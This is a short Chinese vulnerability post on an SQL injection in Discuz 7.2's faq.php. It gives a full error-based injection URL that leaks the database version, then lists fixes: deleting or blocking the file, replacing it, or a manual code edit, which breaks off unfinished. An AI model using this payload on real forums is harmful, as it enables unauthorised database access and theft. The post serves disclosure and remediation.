• Discuz 7.2 /faq.php SQL注入漏洞


    测试方法:

    提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
     
    Discuz 7.2 /faq.php SQL注入漏洞
     
    http://www.xxx.com/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
     
     修复方法:
     

    修复文件: faq.php

    修复方法(一)
    此文件为显示论坛帮助用的,功能相对独立,您可以在服务器禁止该文件的访问,或者直接删除他。对论坛常规功能没有任何影响。

    修复方法(二)
    可以使用本贴中的附件覆盖您的旧文件

    修复方法(三)
    手工修复faq.php
    用编辑器打开该文件


    查找代码:

     } elseif($action == 'grouppermission') {
     
    在下面添加:
    $gids = array();
     
  • 相关阅读:
    统计单词数 OpenJ_Bailian
    整数划分 NBUT
    高精度(x ,/, +, -, %)良心模板
    binary-tree-maximum-path-sum
    2080 特殊的质数肋骨 USACO (深度优先搜索)
    1413 权势二进制
    POJ 1258
    poj 3126
    hdu 1195
    POJ 3752
  • 原文地址:https://www.cnblogs.com/security4399/p/3820110.html
Copyright © 2020-2023  润新知